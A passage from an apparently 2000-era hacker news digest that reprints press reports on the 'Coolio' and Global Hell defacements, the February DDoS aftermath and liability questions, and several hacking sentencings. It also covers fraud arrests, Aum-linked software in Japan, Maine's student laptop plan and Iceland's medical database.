denial-of-service attacks, and he denied any involvement, sources told ABCNEWS. The Coolio in California is believed to be a member of �Global Hell,� a group of teenagers who hacked into White House and Department of Defense computer systems. Dare.org Attacked Los Angeles police began investigating the New Hampshire Coolio after an attack in December 1999 on Dare.org, an anti-drug abuse site the LAPD founded. Detective Brausam of the LAPD Computer Crimes Unit traced the origin of the attack to a Web site hosted by an Internet service provider in Arizona. On Dec. 30, the detective obtained a search warrant to raid the service provider and traced the attack back to the 17-year-old in New Hampshire. The U.S. Secret Service also linked Coolio to an attack on CWC.gov, a Commerce Department site that outlines rules for exporting chemicals that could be used to produce chemical weapons. On Feb. 13, a few days after the flurry of attacks that crippled leading Web sites, RSA Security Inc., an Internet security company based in Bedford, Mass., was hacked into. A hacker calling himself Coolio redirected visitors from RSA�s Web site � which proclaims itself �the most trusted name in e-security� � to another hacked computer at a university in South America. There, a nearly duplicate hoax site proclaimed: �RSA Security Inc. hacked. Trust us with your data. Praise Allah. Owned by Coolio.� Prosecutors to Meet Federal prosecutors planned to meet with New Hampshire prosecutors Friday to discuss charges. One issue to be ironed out is where he will be prosecuted and whether Coolio will be charged as an adult or a juvenile, L.A. police officer Guillermo Campos said. In California, a 17-year-old would be prosecuted as a juvenile, but in New Hampshire someone that age would be prosecuted as an adult. If charged in New Hampshire, he would face five to 15 years in prison. Brausam said Coolio would probably be charged in California with unauthorized access to a computer and felony vandalism and would be charged as a juvenile. That means he faces at least $18,000 in restitution and possible time in a juvenile facility. ABCNEWS' Simon Surowicz, ABCNEWS.com's Erica Rowell and The Associated Press contributed to this report. 'Coolio' Talks In online chats, Coolio�s friends attributed the spate of denial-of-service attacks to him, and he led them to believe he was responsible. But he told ABCNEWS he was just joking. Here are excerpts from ABCNEWS� interview with Coolio and his father: ABCNEWS: Would you consider yourself a hacker? COOLIO: Um. (PAUSE) Yes, I would consider myself a hacker. ABCNEWS: Did you reply to your friends when they said, "Uh, yeah, Coolio did it." COOLIO: Yeah. I joked that I had done it. ABCNEWS: So you actually, in a way, admitted to it? COOLIO: Yes. To my friends. ABCNEWS: You admitted in the chat logs that you had taken Yahoo down? COOLIO: To my friends yes. ABCNEWS: And what did you tell them? COOLIO: I was like, "Yeah, I did it." But I was just joking. COOLIO�S FATHER: Kids. [LAUGHTER] Go on those IRC [Internet Relay-Chat] channels, you see a lot of that stuff happening. ABCNEWS: They brag? COOLIO�S FATHER: They brag and lie about things they've never done. [LAUGHTER] Just like boys. And boys brag all the time. But they've never done nothing. [LAUGHTER] @HWA 117.0 HNN:Mar 3rd: US Army Web Attacker Sentenced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Mindphasr (Chad Davis) was sentenced to six months in prison, three years of supervised probation, and ordered to pay $8,054 in restitution Wednesday for defacing the Web site of the U.S. Army. The defacement occurred on June 27th of last year. Nando Times http://www.techserver.com/noframes/story/0,2294,500175665-500228667-501105423-0,00.html (404/expired) Attrition.org - Defacement Mirror http://www.attrition.org/mirror/attrition/1999/06/27/www.army.mil/ -=- Other source, no url sorry... A hacker convicted of breaking into a US Army Web site has reportedly been sentenced to six months in prison and fined $8,054. An Associated Press report today said that 20-year-old Chad Davis pleaded guilty Jan. 4 to gaining unauthorized access to the site and altering its contents by replacing the Army's opening Web page with the "signature page" of Global Hell, a nationwide hacker group of which he was a member. US District Judge J.P. Stadtmueller, sitting in Milwaukee, ordered Davis to reimburse the military the cost of restoring the site and added three years of supervised release to the prison term, the report said. "This is a deadly serious business. It's not something that's a sandbox play tool," the judge is quoted as saying. In other hacking news, the latest congressional Web site to be cracked belongs to House Speaker Dennis Hastert, R-Ill. According to The Washington Post, Haster's Web site was out of commission for several days, with visitors to the homepage getting nothing more than a stream of nonsensical text. The site is back up, according to leadership spokespeople -=- The fated defacement; (source) [gH] Alive as ever. [gH] Hello.
This web page hack has a purpose. Purpose being to settle rumors.
global hell/gH is alive.
global hell/gH will not die.
global hell/gH will always be here.
global hell/gH would like to thank all the individuals and groups who have supported us and done what they could. Your work did not go unoticed. Much respect to you all. You know who you are.

krx. Coming soon.
@HWA 118.0 HNN:Mar 3rd: Who is Liable If Computers Used in Attacks? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The question of liability has been raised in the wake of the recent DDoS against major sites on the internet. The computers used to launch the attacks are not only the culprits but the victims as well. No one seems to have sued a third-party site for being used to perpetrate a cyber-attack. But because most attacks are presumed to be judgment-proof (no money to pay restitution), it is only a matter of time before companies that suffer damage from attacks find someone who can pay that they can sue. The legal question in such lawsuit would be whether the computer owner had a duty of care to the victim. New York Law Journal http://www.nylj.com/stories/00/03/030200a5.htm Getting Hacked Could Lead to Getting Sued BY RITCHENYA A. SHEPHERD American Lawyer Media News Service Thursday, March 2, 2000 WHILE COMPUTER hackers hack and the feds wring their hands, companies rushing to connect to the Internet are twisting in the wind of potential liability. The hackers that overwhelmed several big Web sites � including those of Amazon.com, Buy.com, CNN, eBay, Excite and Yahoo! � with traffic a few weeks ago used other people's computers to do it. The hackers mounted their attacks by penetrating university computers and commanding them, in turn, to deluge the providers with more traffic than individual hackers themselves could generate. According to specialists in computer law, future attacks could just as well use commercial computers. And that fact brings with it an increased responsibility to beef up security, the lawyers warn. "The hijacked sites are in a unique position; they are both victims and the culprits," said Marcelo Halpern, of Chicago's Gordon & Glickson LLC. "The question is, are they victims that could have protected themselves?" No one appears yet to have sued a third-party site for being used to perpetrate a cyber-attack. But because most hackers are presumed to be judgment-proof, there is a consensus that it is only a matter of time before companies that suffer damage from attacks start to move up the food chain. "Somebody's going to get sued; that's clear," said David J. Loundy, of Chicago's D'Ancona & Pflaum LLC. "Somebody's going to want a test case. The issue [is] whether there's going to be one or two of these suits, or whether it's going to be open season against service providers," said Mr. Loundy, who teaches computer crime at Chicago's John Marshall Law School. "I think there's a straightforward negligence argument," said Stewart A. Baker, a partner at Washington, D.C.'s Steptoe & Johnson LLP. "People hacked into these computers using known holes in most cases. If you maintain security against known hacker attacks, then it's much more difficult to plant the code that allows your server to be turned into a zombie." The issue in such a suit would be whether the computer owner had a duty of care to the ultimate victims. "Whether there's a duty depends on whether the courts think there should be," Mr. Baker said. "As the damage to others increases, I think courts will have less and less patience [for the argument] that there's no duty." Amazon.com, Buy. com, CNN, eBay, Excite and Yahoo! all declined to comment on whether they are contemplating actions against the third-party sites used in attacks against them on Feb. 8 and 9. Lawyers say that the invaded universities make unlikely litigation targets. The University of California at Los Angeles, U.C. Santa Barbara and Stanford University all have confirmed that their computers were used in the attacks. All three are cooperating with the FBI investigation. Stanford officials say that the attack on eBay used a computer at the university's Hopkins Marine Station in Monterey, Calif., which was not as well watched as others. "We will be monitoring it much more closely," said Steve Hansen, Stanford's computer security chief. "University sites are notoriously lax in their security," said Mr. Halpern, so "they tend to be fairly easy targets for hackers." But "the sites that were hijacked don't make for the nicest defendants ... you're not going to get public sympathy on your side suing a university." Universities provide public services and must weigh security concerns against academic needs for freedom of speech and experimental liberties, lawyers say. Therefore, a university could be held to a lower standard than a business. But with every new hacker attack, the lawyers say, the standard of care that would be applied by a court is likely to rise a notch. "Right now, the basic standard is a firewall," said Howard L. Nations, a Houston solo practitioner. "But I think the more foreseeable potential hacking becomes, the greater the burden to go beyond a firewall and write your own software ... to cope with your site's potential security problems." A firewall is a gate between the Internet and individual computers that lets through some, but not all, traffic, depending on its program. "The problem is, it's a moving target," Mr. Nations said of security. "State-of-the-art [technology] changes exponentially ... and the hackers are moving exponentially plus, so it's a constant battle." "Two ways to stay current are to check with Carnegie Mellon University's Computer Emergency Response Team, which tracks hacking, and the Sans Institute, in Bethesda, Md., which has posted a "road map" to prevent attacks such as those launched in early February. But things threaten to become "worse, real fast," warns Sans Research Director Alan Paller. The attacks identified so far have come from computers operating Sun's Solaris or Linux operating systems. But on Feb. 18, administrators identified 160 Windows-based PCs at James Madison University in Virginia with the same DOS attack code, indicating that they had been prepared for hacker use. "That means an automated script exists that can take over PCs," said Mr. Paller, so computer administrators should upgrade their virus software fast. "A lot of people run computers that are unprotected," he said. Even workplaces with firewalls are vulnerable because employees may disengage them to download Internet goodies. The recent attacks could encourage federal legislation. Representative Thomas M. Davis, R-Va., is drafting a bill that would create an information analysis center to encourage organizations to share information about cyber-attacks. The bill would protect disclosing parties from liability and Freedom of Information Act requests, said Representative Davis' spokesman, David Marin. Mr. Paller, who participated in President Clinton's Feb. 15 summit on on-line security, said he expects bills that will take down barriers to sharing information about cybercriminals across state lines and that will set security standards for government contractors. Despite the Internet community's dislike of regulation, lawyers say, someone must set the standard of care. "The technology community will say up and down that they don't think the government should be involved in this, but once they see what private lawyers and judges come up with, they'll be much more open to government action," Mr. Baker said. Administrators are increasing security by rejecting connection requests from sites suspected of adopting inadequate standards. And inquiries for hacker insurance appear to be on the rise. These measures may not calm the storm. "People don't like to hear this, but let's face it: Part of the Internet is just not ready for prime time," Mr. Loundy said. "This is a system that a 12-year-old can manipulate and take offline." @HWA 119.0 HNN:Mar 3rd: Email Threat Lands Teenager In Jail ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by David Schwindt A 15-year-old High School student is currently in police custody after allegedly threatening school officials Monday with a plan to "blow (the school) to pieces." The threat was delivered via email from a computer within the school. Chad Varner was arrested Wednesday on a charge of making threats to place an explosive or incendiary device. Clinton Herald http://www.clintonherald.com/display/inn_news/news1.txt Clinton police chief announces his resignation By Lori Allesee/Herald Staff Writer CLINTON - Clinton Police Chief Gene Beinke announced Thursday he will turn in his badge next month to pursue other career interests. Beinke's notice was submitted to members of the Clinton City Council today. Beinke, who is Clinton's longest serving police chief, will retire from his position May 15. "I have chosen to pursue other career interests," said Beinke, 54, in his letter of resignation. "I am grateful for having had the opportunity to serve you and the community and will take with me many good memories." Beinke could not be contacted for comment today. The Clinton Civil Service Commission will immediately begin searching for Beinke's replacement by compiling a pool of eligible candidates, said City Administrator George Langmack. From the Civil Service Commission's list of finalists, Langmack will make an appointment with the approval of the Clinton City Council. Beinke's successor is expected to be named within 60 days of his resignation. Beinke was appointed as Clinton's police chief in April 1986. A month later, on May 19, 1986, Beinke took over as the Clinton Police Department's leader. He replaced Russel Bentley. During his tenure, Beinke established Clinton's School Resource Officer Program and the Citizen Police Academy. In 1994, Beinke persisted through an on-going controversy about his management of the police department. That controversy was spearheaded by some City Council members who wanted Beinke terminated. Those allegations set the stage for the same group of people to investigate Langmack. The council believed Langmack failed in his responsibilities when he did not relieve Beinke of his duties. Beinke was later exonerated by the Iowa Attorney General's Office of any allegations of wrong-doing. The Iowa Attorney Genera's Office stated that the allegations were management questions and that only complaints alleging criminal violations would justify inquiry. Less than a year later, Beinke suffered a brain hemorrhage that took him off the job for nearly three months. Upon his return, one councilmen prompted a campaign to dismiss Beinke from his job. The councilmen questioned Beinke's ability to perform as chief of police. However, that effort failed. Beinke began his law enforcement career in 1970 when he joined the Waterloo Police Department. Four years later, he took on several roles with the Cedar Falls Police Department. Beinke later joined the Evansville Police Department, serving as a police officer and later as chief of police. In 1983, Beinke accepted the chief of police position in Washington. While serving with the Washington Police Department, Beinke co-founded the Midwest Association of Police and Prosecutors. Beinke is the second top civil servant in four months to announce his retirement. In November, Clinton Fire Chief Russ Luckritz declared his intention to retire. Luckritz, who served as Clinton's fire chief since 1986, stepped down from his position in January. Luckritz's successor is expected to be announced Tuesday. @HWA 120.0 HNN:Mar 3rd: Japanese Afraid of Cult Software ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is an intriguing story, anyone have any further material on this? - Ed contributed by turtlex hacker Software purchased by the defense agency of Japan would link the networks at 20 army garrisons across Japan, giving them internet and e-mail access. It has been discovered that some of the software may have been written by members of the Aum Shinrikyo cult. It is feared that Aum Shinrikyo, which carried out the fatal gas attack on the Tokyo subway in 1995, may have left backdoors into the software they wrote allowing them access to defense computer systems. After police raided the apartments of eight cult members it was discovered that several software firms run by Aum members have also provided products for the Construction Ministry, the Education Ministry, and the Post and Telecommunications Ministry. BBC http://news.bbc.co.uk/hi/english/world/asia-pacific/newsid_662000/662172.stm Japan's computers hit by cult fears Thousands of people were injured in the 1995 attack Japan's Defence Agency has delayed the introduction of a new computer system after discovering that it used software developed by members of the Aum Shinrikyo cult. The discovery has prompted fears that the cult - which carried out the fatal gas attack on the Tokyo subway in 1995 - could use the software to infiltrate government computers and gain access to vital defence information. Tokyo police said the Defence Agency was one of 90 government bodies and private firms which had ordered software produced by the cult. A Defence Agency spokesman told the AFP news agency: "We had been expecting to introduce the system today but halted the plan for the time being as it is too dangerous. "Nobody knows what they have done to the system and we need to check it thoroughly." Chief Cabinet Secretary Mikio Aoki told a news conference: "It should not be impossible to replace the software with that developed by other companies." Subcontractor The Defence Agency signed a contract for the computer system with the Japan Electronic Computer Co Ltd last October. The company, which is not linked to Aum, was to supply the system linking networks at 20 army garrisons across Japan, giving them internet and e-mail access, the defence agency spokesman said. However, the computer firm "told us they had discovered one of the subcontractors they used was linked to Aum". The spokesman said the Defence Agency was "investigating whether Aum members, under the pretext of developing software for the agency, had a chance to figure out ways to break the firewall" that prevents illicit access to its networks. Tokyo police said software firms run by Aum members had also provided products for the Construction Ministry, the Education Ministry, and the Post and Telecommunications Ministry. Raids The deals were discovered on Tuesday after police launched raids on eight apartments belonging to cult members. Local reports said about 40 Aum followers were operating five software companies and conducted sales activities covering 500 major companies by offering large discounts. Twelve people were killed and thousands more were injured when Aum launched the sarin gas attack on Tokyo's subway system in March 1995. Aum preached that the world was coming to an end and the cult must arm itself. However in January this year, the cult issued a statement deposing jailed Shoko Asahara as leader, changing its name to Aleph, and vowing to introduce reforms - which included a promise to obey the law. @HWA 121.0 HNN:Mar 3rd:B2B Site Compromised Hours After Going Online ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Three hours after launching the business-to-business e-commerce web site it had been broken into. The web site, EDAToolsCafe.com, reported the break-in to the FBI's San Jose, California regional office who are looking into the attack. Business Wire - via Excite News http://news.excite.com/news/bw/000301/ca-edatoolscafe.com "Electro" Hacks EDAToolsCafe.com B2B Portal Updated 11:00 AM ET March 1, 2000 SAN JOSE, Calif. (BUSINESS WIRE) - EDAToolsCafe.com a Silicon Valley based premier EDA (Electronic Design Automation) web portal opened its business- to-business e-commerce operation at 10AM Monday morning, February 28, and was brought down less than three hours later, at 12.24PM by a hacker or hackers who call themselves "Electro." The break-in was reported to the FBI's San Jose, California regional office who are looking into the attack. The EDAToolsCafe site, which has been in operation for more than three years providing resources for the EDA engineering community, announced the opening of its b2b e-store in a Business Wire press release earlier in the day. The announcement released jointly by Cohesion Systems a participating EDA software vendor and EDAToolsCafe, was sent over the wire and disseminated just hours before the break-in. Internet Business Systems, Inc. (IBS) owns and operates the EDAToolsCafe portal which features sponsorship from Sun Microsystems, Mentor Graphics, Avant!, and other major EDA companies. "The hackers were real pros, but they triggered one of our 'trip-wires' and alerted us to their intrusion early in the game," said Brian Haney, IBS VP of Engineering. "The intruders were able to gain access to our server and were in the process of setting up a process that they could then in-turn use to hack the IRC (Internet Relay Chat) network when we shut them down. In the process, they left their signature, a tell-tale calling card 'Electro'." Mr. Haney also said "they had installed modified versions of a number of Unix processing and process monitoring programs in an attempt to hide behind these and obscure their presence. They were in the process of activating two programs, one called 'muh,' and the other called 'milk' written by a Czechoslovakian programmer. These utilities, once activated, would have allowed the perpetrators to hide behind the EDAToolsCafe while they raided the IRC or caused havoc at other major web sites." Expert assistance, in the form two teenage web system pros, was called in to pinpoint the break-in point and install safeguards to prevent future intrusions. The site was put back in service at 10Am Tuesday morning, February 29 after shutting down the EDAToolsCafe server, flushing it out, and installing finer grain trip-wires. "The cost to IBS in terms of lost advertising revenues and e-commerce was minimal and the lessons learned will help prevent future situations of this type." Said David Heller, IBS President. He also said that, "The shut down and subsequent refocusing of engineering resources will slightly delay the introduction of e-Catalog, a complete b2b solution that was scheduled to premiere on Wednesday, March 1. But, it's better to be safe than sorry." Contact: Internet Business Systems, Inc., San Jose Sanjay Gangal, 408/260-8010 marketing@ibsystems.com @HWA 122.0 HNN:Mar 3rd:State of Maine May Give Computers to All Students. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by SonjaC State of Maine Governor Angus King has said that starting in 2002, he wants each of Maine's 17,000 seventh-graders to get issued laptop computer and receive internet access. King hopes to supply $75 million in Federal and state funds to pay for the plan. Some lawmakers said that the money would be better spent fixing leaky school roofs. (The hardware is worthless without the education to support it. Hope they take into account the cost of software, technical support and upgrades.) Nando Times http://www.nandotimes.com/technology/story/body/0,1634,500175805-500228878-501106733-0,00.html Maine governor wants a computer on every 7th-grader's lap Copyright � 2000 Nando Media Copyright � 2000 Associated Press By GLENN ADAMS GARDINER, Maine (March 2, 2000 3:50 p.m. EST http://www.nandotimes.com) - Echoing the old political promise of a chicken in every pot, Gov. Angus King on Thursday said he wants to put a computer on every kid's lap. Starting in 2002, he wants each of Maine's 17,000 seventh-graders to get a laptop computer that will be theirs to keep, regardless of whether they have one at home. What King calls the nation's most far-reaching school computer initiative generated a cool if not skeptical response in the state Legislature. Reaction in schools across the state was mixed. "The `haves' don't need two or three computers at home," said Howard McFadden, principal of an 80-student school in Edmunds Township. He would like to see the "have-nots" get computers, though. Under King's proposal, students would get computers when they enter the seventh grade. The governor, an independent, hopes to draw $25 million in federal and private money to supplement $50 million in state money and create an endowment that would pay for computers for every succeeding seventh-grade class. "I have not yet run across an idea with more potential to really make a difference in our schools, in our education system and in our young people's prospects, and that's what it's really all about," King said. Some lawmakers balked at the one-time cost of $50 million from the state budget, suggesting that fixing leaky school roofs, for example, should get a higher priority. Requests for school repairs already far exceed the money available, they said. "The choice of laptops over school renovations is something I can't fathom," said state Rep. Elizabeth Townsend, co-chairwoman of the Appropriations Committee. The proposal earned King praise from educators like Chris Toy, principal of the Freeport Middle School, where 100 seventh-graders would be eligible. "You definitely have to take care of bricks and mortar, but we also need to look at constructing students' minds," he said. The prototype laptops sell for about $600 or $700, but the governor hopes they can be purchased in bulk for as little as $500. King said that Maine is already "doing a ton of construction" and that the state should not wait "until every last gutter is fixed" to adopt the idea. @HWA 123.0 HNN:Mar 6th: Coolio Not a Suspect in DDoS Attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Simple Nomad Despite what has been published by some overzealous media outlets 'Coolio' is not a suspect in the recent DDoS attacks. While admitting to defacing several hundred web sites including dare.org and rsa.com he has denied any involvement in the DDoS attacks. The FBI has said that they doubt he is responsible for the attacks. While Coolio's computer and other belongings have been confiscated no charges have yet been filed. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2455311,00.html Coolio' not a suspect in DoS attacks Despite admitting hacking 100 sites, the 17-year-old is not responsible for big denial-of-service attacks on Web sites, investigators say. By David S. Cloud and Joe Mathews, WSJ Interactive Edition March 3, 2000 8:08 AM PT WASHINGTON -- Federal Bureau of Investigation agents investigating last month's Web-site attacks said they don't think a 17-year-old New Hampshire youth whose name surfaced as a suspect is responsible for the incidents. The young man, who goes by the online handle "Coolio," became a suspect last month after someone using that moniker claimed credit for several Web attacks. Los Angeles police questioned him recently in connection with attacks on an antidrug site that officers there run, a Los Angeles Police Department spokesman said. The youth acknowledged hacking into that site and at least 100 others, the spokesman said. Local prosecutors are still considering charging him with computer crimes unrelated to last month's attacks on major commercial Web sites such as those operated by eBay Inc. (Nasdaq: EBAY) and Yahoo Inc., (Nasdaq: YHOO) according to the spokesman. The youth's name couldn't be learned. Investigators carried out a search warrant on the youth's home last month and confiscated several computers that were examined by the FBI. Federal investigators believe that other hackers may have used the name Coolio. As for who is responsible for the denial-of-service attacks, officials said that they have "promising leads" and that prospects are improving for arrests in the case. The leading theory remains that the initial outages beginning Feb. 7 were coordinated by an individual or a group and were followed by copycat incidents. One federal law-enforcement official said the FBI fieldwork was "focused in the Atlanta and Boston field offices." Gail Marcinkiewicz, spokeswoman for the Boston FBI field office, wouldn't confirm that, saying only that the division had made no arrests in the case @HWA 124.0 HNN:Mar 6th:Gatsby of the PhoneMasters gets 18 Months ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse The Gatsby (Jonathan Bosanac) has been sentenced to 18 months in federal prison. He was also ordered to pay $10,000 in restitution to three telephone companies. As a member of the 'PhoneMasters' Gatsby and others perpetrated one of the largest telephone fraud activities ever committed. The crimes took place more than five years ago. Friends say the man's life has since turned around. He's been working as a computer consultant. Associated Press - via Fox News http://www.foxnews.com/vtech/030500/hack.sml A computer hacker known online as "The Gatsby" will spend 18 months in federal prison. A judge in San Diego has sentenced Jonathan Bosanac for electronically breaking into some of the country's largest computer systems. The judge said his wrongdoing caused more than $1 million in damage to one company alone. Bosanac was ordered to pay $10,000 in restitution to three telephone companies he hacked into. He pleaded guilty in December to participating in one of the nation's biggest hacking schemes. The crimes took place more than five years ago. Friends say the man's life has since turned around. He's been working as a computer consultant. @HWA 125.0 HNN:Mar 6th: Cyber Intrusion Used to Cover Up Software Glitch ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evenprime Last week's alleged DoS attack on National Discount Brokers was later determined to be a third-party software incompatibility. Chairman Dennis Marino said last week the site outages "had the earmarks of a hacker attack." (Our sites down? We must be under attack!) Reuters - via ZD Net http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2455264,00.html?chkpt=p1bn Wired http://www.wired.com/news/business/0,1367,34719,00.html Reuters: Mar 3, 2000 4:51 AM PT Web trading site blames hackers -- sort of National Discount Brokers Group Inc. said periodic disruptions since last Thursday to its site at http://www.ndb.com were the result of software incompatibility with products of an outside company. The explanation appeared to step back from comments by a company executive when the disruptions began at the NDB.com site last week. At that time, Chairman Dennis Marino said the site outages "had the earmarks of a hacker attack. " As a result of what it now said was software conflicts, the company said its NDB.com site had been subjected to "several instances of hacker-like denial of services" that precluded some of the company's customers from reaching the Web site. -- Reuters -=- Wired; Hacked by Flawed Software Reuters 7:25 a.m. 3.Mar.2000 PST NEW YORK -- Hacker attacks can be used to explain a host of Internet ills. Online brokerage National Discount Brokers Group Inc. on Thursday gave new definition to the latest criminal phobia by blaming recent outages at its online trading site on "hacker-like" attacks by an unnamed Web software maker. In a statement, the Jersey City, N.J.-based online share dealer said periodic disruptions since last Thursday to its site were the result of software incompatibility with products of the outside company. The explanation appeared to step back from comments by a company executive when the disruptions began at the NDB.com site last week. At that time, Chairman Dennis Marino said the site outages "had the earmarks of a hacker attack." As a result of what it now said was software conflicts, the company said its NDB.com site had been subjected to "several instances of hacker-like denial of services" which precluded some of the company's customers from reaching the Web site. NDB said it was mulling legal action against the company. By contrast, last month's assaults on major Web sites such as Yahoo! Inc., eBay Inc. and ETrade Group Inc. were widely believed to have involved the more conventional explanation of hacker attacks: computer break-ins by Internet vandals. Through a method known as "denial of service," hackers set up automatic programs that bombard Web sites with so many information requests that legitimate users cannot log on, law enforcement officials have said. National Discount said it had been in contact with the software maker and is working to correct the problems with the software program but that it was also seeking "appropriate judicial relief." On the busiest day of Web site attacks in February, Datek Online Holdings Corp. another online broker, had initially joined the chorus of companies blaming hackers for the site's disruptions. However, it later retracted the comments and said the outage was caused by an equipment breakdown by an outside network supplier. The 35-minute outage occurred at the opening of U.S. stock markets, a peak usage period for trading sites. In its own explanation, a spokesman for National Discount declined to go beyond the wording of its news release and referred calls to the company's legal counsel. The in-house lawyer did not immediately return calls seeking comment. NDB said the situation had resulted in an overall periodic slowdown of Web site performance as well as delays in reaching customer service agents and registered representatives, crucial issues for a business built around quick trading transactions. This could help explain why average transaction processing time at NDB for the week of February 22-25 ranked at the bottom of an index of 16 Web broker sites compiled by Keynote Systems Inc., a company that tracks Web site performance. According to Keynote's weekly Web Broker Trading Index, NDB customers had to wait an average of 43.9 seconds to reach National Discount's site, twice as slow as the next slowest online trading site. National Discount stressed that at no time during these incidents was any customer account accessed and no customer account information was affected. The outage meant its 200,000 customers could not funnel stock orders through the firm's Web site, although they could relay orders over the phone. The company said that it had determined the cause of the service outages by working with law enforcement officials, regulatory agencies and NDB.com's in-house technology staff. NDB has also instituted a number of additional anti-hacking measures on its computer systems, it said. Copyright � 1999-2000 Reuters Limited. @HWA 126.0 HNN:Mar 6th: Microsoft Hit in Israel ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse Internet Gold, an Israeli ISP, said Sunday that cyber vandals had briefly paralyzed the new Microsoft Corp. web site on Saturday. www.msn.co.il was evidently hit with so much traffic that access was slowed for about an hour. Evidently the attack was aimed at a separate site and was only being channeled through the Microsoft site. (There is a severe lack of information in this article.) Reuters - via ZD Net http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2456092,00.html?chkpt=p1bn Mar 5, 2000 11:07 AM PT Hackers attack MS site in Israel JERUSALEM -- Israeli ISP Internet Gold said Sunday hackers had briefly paralyzed its new site with Microsoft Corp. on Saturday. Internet Gold CEO Eli Holtzman, said hackers bombarded Microsoft's new Israeli site, www.msn.co.il, with so much traffic that slowed access for about an hour. He said hackers had channeled the traffic through Internet Gold with the aim of harming another Web site, which he declined to name, located outside Israel. "We are in contact with (the company) to prevent such an event in the future,'' Holtzman told Reuters. He would not say whether the attack came from inside Israel or from abroad, but he stressed that the cyber invasion broke through a single unprotected Internet gateway and did not collapse network security barriers. In February, a wave of hacker attacks took down half a dozen popular Internet sites. -- Reuters @HWA 127.0 HNN:Mar 6th: Credit Card Numbers Used in Scam ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse Italian Giuseppe Russo, 34, and his wife, Croatian Sandra Elazar, 33, have been arrested in Sicily after obtaining the numbers to some 1,000 credit cards and going on a costly spending and gambling spree. They used the cards over several months and recently began to play the lottery to transform the credit into cash. They gambled away 1.5 billion lire (S$1.3 million), and the winnings were paid into bank accounts. The Straits Times http://www.straitstimes.asia1.com/world/wrld13_0306.html Net to steal 1,000 credit card numbers ROME -- Two cyber pirates have been arrested in Sicily after using the Internet to access about 1,000 US credit-card numbers and going on a costly spending and gambling spree, Italy's financial watchdog has said. Italian Giuseppe Russo, 34, and his wife, Croatian Sandra Elazar, 33, started the scam after obtaining the numbers of some 1,000 credit cards from a Chase Manhattan bank and a Citibank Universal branch in the US. Over several months they went on a binge via the Internet. But in the last month, the pair began to play the lottery to transform the credit into cash. They gambled away 1.5 billion lire (S$1.3 million), and the winnings were paid into bank accounts. -- AFP @HWA 128.0 HNN:Mar 6th: Iceland Sells Its Soul ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Dan The medical and genealogy records of every man, woman and child within Iceland are now the property of a private medical research company known as DeCode. It is hoped that the records will help researchers to fight disease. Critics worry about the loss of privacy and possible breaching of doctor patient confidentiality. CNN http://www.cnn.com/2000/WORLD/europe/03/03/iceland.genes/index.html Iceland sells its medical records, pitting privacy against greater good March 3, 2000 Web posted at: 4:09 a.m. EST (0909 GMT) From staff reports REYKJAVIK, Iceland (CNN) -- Iceland has sold the medical and genealogy records of its 275,000 citizens to a private medical research company, turning the entire nation into a virtual petri dish in hopes of finding cures to diseases that have afflicted humans for ages. But the promise of curing disease hasn't stopped critics from worrying about privacy issues created by the sale and storage of personal medical and genetic records. "In our company," said Kari Stefansson of DeCode, the U.S.- funded firm which bought the records, "we have the genealogy of the entire people for 1,000 years back in time and a computerized record of who is related to whom." The Icelandic population's unique ability to trace its family trees back to the island nation's first settlers, makes it a prime candidate for this never before attempted mammoth research experiment. Stefansson says these detailed records make Iceland the ideal laboratory for tracing the flow of genetic information from one generation to another. He's betting that a vast, centralized data bank of medical and genetic records might offer clues to why certain people tend to develop specific maladies, perhaps offering the world a chance to understand the diseases and then develop cures for them. But many members of Iceland's medical community are concerned that allowing the nation's genetic information to be sold will breach the trust between doctor and patient. Some physicians fear their patients might not be as forthcoming about personal information, knowing that it would eventually be stored in the centralized data bank. The government has allayed those fears somewhat by allowing citizens to opt out of the genealogical data base. So far, only about 5 percent of Icelanders have chosen not to participate. Other critics are confident the project will fail because, they say, so many doctors are against it. They're predicting physicians will refuse to comply with the law that requires them to deliver new data to the genetic data bank. Stefansson, a former Harvard professor, offered his own explanation why Iceland should support the experiment. "Recognize that knowledge is never evil in of itself," he said. "If you run the world by forbidding new discoveries, you are controlling the world in an unpredictable manner. You are putting yourself in the position of God." Correspondent Jerrold Kessell contributed to this report. @HWA 129.0 HNN:Mar 6th: Clinton Says No To Email ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by richardm When asked if he talked with his daughter Chelsea via Email while she was in college, US President Bill Clinton replied "I don't do e-mail with Chelsea, Absolutely not -- I don't think it's secure." (Evidently online privacy carries a little more weight with Bill than I thought.) San Jose Mercury News http://www.mercurycenter.com/business/top/047783.htm Posted at 10:33 p.m. PST Friday, March 3, 2000 `I don't do e-mail with Chelsea' BY DAN GILLMOR Mercury News Technology Columnist All over America, parents exchange e-mail with their children when the kids head off to college. Meet one parent who doesn't: Bill Clinton. ``I don't do e-mail with 